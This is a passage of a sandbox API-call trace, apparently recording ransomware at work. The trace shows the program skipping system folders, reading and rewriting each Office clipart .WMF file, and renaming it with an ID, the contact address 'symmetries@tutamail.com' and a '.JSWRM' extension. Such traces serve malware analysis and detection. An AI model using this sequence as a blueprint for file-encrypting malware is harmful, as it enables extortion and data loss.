Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0089.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.235] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0304371.WMF", cAlternateFileName="")) returned 1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2=".") returned 1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="..") returned 1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="...") returned 1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="windows") returned -1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="recovery") returned -1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="perflogs") returned -1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="documents and settings") returned 1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="system volume information") returned -1 [0089.235] lstrcmpiW (lpString1="J0304371.WMF", lpString2="msocache") returned -1 [0089.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0089.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304371.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304371.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304371.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0089.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0089.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304371.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304371.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304371.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0089.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.236] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3616) returned 1 [0089.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe20) returned 0x23fc98 [0089.236] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe20, lpOverlapped=0x0) returned 1 [0089.238] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.238] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe20, lpOverlapped=0x0) returned 1 [0089.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0089.239] CloseHandle (hObject=0x314) returned 1 [0089.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0089.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0089.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0089.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0089.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0089.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0089.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.240] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x103e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0304405.WMF", cAlternateFileName="")) returned 1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2=".") returned 1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="..") returned 1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="...") returned 1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="windows") returned -1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="recovery") returned -1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="perflogs") returned -1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="documents and settings") returned 1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="system volume information") returned -1 [0089.240] lstrcmpiW (lpString1="J0304405.WMF", lpString2="msocache") returned -1 [0089.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304405.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304405.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304405.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304405.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304405.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304405.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.241] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4158) returned 1 [0089.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1030) returned 0x23fc98 [0089.241] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1030, lpOverlapped=0x0) returned 1 [0089.243] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.243] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1030, lpOverlapped=0x0) returned 1 [0089.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0089.243] CloseHandle (hObject=0x314) returned 1 [0089.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0089.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0089.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0089.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0089.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.244] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a0e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0304853.WMF", cAlternateFileName="")) returned 1 [0089.244] lstrcmpiW (lpString1="J0304853.WMF", lpString2=".") returned 1 [0089.244] lstrcmpiW (lpString1="J0304853.WMF", lpString2="..") returned 1 [0089.244] lstrcmpiW (lpString1="J0304853.WMF", lpString2="...") returned 1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="windows") returned -1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="recovery") returned -1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="perflogs") returned -1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="documents and settings") returned 1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="system volume information") returned -1 [0089.245] lstrcmpiW (lpString1="J0304853.WMF", lpString2="msocache") returned -1 [0089.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0089.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304853.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304853.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304853.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0089.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304853.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304853.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304853.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.246] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18958) returned 1 [0089.246] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4a00) returned 0x24d210 [0089.246] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4a00, lpOverlapped=0x0) returned 1 [0089.249] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.249] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4a00, lpOverlapped=0x0) returned 1 [0089.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.249] CloseHandle (hObject=0x314) returned 1 [0089.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0089.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0089.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0089.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0089.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0089.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.250] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0089.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.250] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cf8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0304861.WMF", cAlternateFileName="")) returned 1 [0089.250] lstrcmpiW (lpString1="J0304861.WMF", lpString2=".") returned 1 [0089.250] lstrcmpiW (lpString1="J0304861.WMF", lpString2="..") returned 1 [0089.250] lstrcmpiW (lpString1="J0304861.WMF", lpString2="...") returned 1 [0089.250] lstrcmpiW (lpString1="J0304861.WMF", lpString2="windows") returned -1 [0089.251] lstrcmpiW (lpString1="J0304861.WMF", lpString2="recovery") returned -1 [0089.251] lstrcmpiW (lpString1="J0304861.WMF", lpString2="perflogs") returned -1 [0089.251] lstrcmpiW (lpString1="J0304861.WMF", lpString2="documents and settings") returned 1 [0089.251] lstrcmpiW (lpString1="J0304861.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.251] lstrcmpiW (lpString1="J0304861.WMF", lpString2="system volume information") returned -1 [0089.251] lstrcmpiW (lpString1="J0304861.WMF", lpString2="msocache") returned -1 [0089.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0089.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304861.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 